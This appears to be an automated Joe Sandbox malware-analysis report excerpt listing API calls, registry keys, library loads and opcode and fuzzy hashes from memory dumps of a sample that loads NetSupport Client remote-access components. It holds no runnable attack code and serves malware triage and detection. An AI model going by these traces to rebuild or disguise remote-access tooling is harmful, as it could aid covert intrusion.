• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: ??CTL32.DLL
• API String ID: 1029625771-2984404022
• Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
• Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
• Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
• Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
APIs
• GetDriveTypeA.KERNEL32(?), ref: 11026B6D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: DriveType
• String ID: ?:\
• API String ID: 338552980-2533537817
• Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
• Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
• Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
• Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
APIs
  • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
• RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
Strings
• Error %d Opening regkey %s, xrefs: 110ED1CA
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: CloseOpenwvsprintf
• String ID: Error %d Opening regkey %s
• API String ID: 1772833024-3994271378
• Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
• Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
• Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
• Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
APIs
• RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
Strings
• Error %d closing regkey %x, xrefs: 110ED17D
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: Closewvsprintf
• String ID: Error %d closing regkey %x
• API String ID: 843752472-892920262
• Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
• Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
• Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
• Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
APIs
• LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,02B4B870,?,?,?,00000100,?,?,00000009), ref: 111463E9
  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: HandleLibraryLoadModule
• String ID: NSMTRACE
• API String ID: 4133054770-4175627554
• Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
• Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
• Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
• Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
• Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
• Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                        • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                        • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
• Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
• Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
• Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
• Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
APIs
• _memset.LIBCMT ref: 11074E1F
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: FreeLibrary_memset
• String ID:
• API String ID: 1654520187-0
• Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
• Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
• Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
• Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
APIs
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
• std::exception::exception.LIBCMT ref: 1105FD93
• __CxxThrowException@8.LIBCMT ref: 1105FDA8
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID:
• API String ID: 1338273076-0
• Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
• Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
• Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
• Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
APIs
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: _malloc_memmove
• String ID:
• API String ID: 1183979061-0
• Opcode ID: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
• Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
• Opcode Fuzzy Hash: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
• Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
APIs
• _memset.LIBCMT ref: 110883EF
• InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
• API String ID: 453477542-0
• Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
• Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
• Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
• Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
• ExtractIconExA.SHELL32(?,00000000,001B0269,0005041D,00000001), ref: 11144498
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: ExtractFileIconModuleName
• String ID:
• API String ID: 3911389742-0
• Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
• Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
• Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
• Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
APIs
  • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
• __lock_file.LIBCMT ref: 11163DFE
  • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
• __fclose_nolock.LIBCMT ref: 11163E09
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                        • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                        APIs
                                                                                          • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                          • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                        • GetLastError.KERNEL32(?,02B4B870,000000FF,?), ref: 11144ED5
                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B4B870,000000FF,?), ref: 11144EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3768737497-0
                                                                                        • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                        • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                        • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                        • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
